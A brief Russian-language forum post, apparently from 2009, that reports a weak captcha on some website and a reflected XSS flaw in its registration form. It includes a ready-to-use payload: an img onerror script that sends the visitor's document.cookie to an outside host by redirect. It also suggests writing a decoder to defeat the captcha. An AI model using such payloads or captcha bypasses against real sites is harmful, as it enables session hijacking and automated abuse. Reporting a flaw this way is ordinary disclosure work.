На странице слабая капча. Одинаковые фон, позиция, длина, нет искажения. Можно написать декодер.
UPD: В форме регистрации пассивная XSS. Если ввести <img src=. onerror=document.location='http://www.google.com/search?q='+document.cookie>unexistant_login111 в логин и нажать "Проверить", перекинет на гугл с кукой.
Последний раз редактировалось MasterProg; 12.06.2009 в 20:27..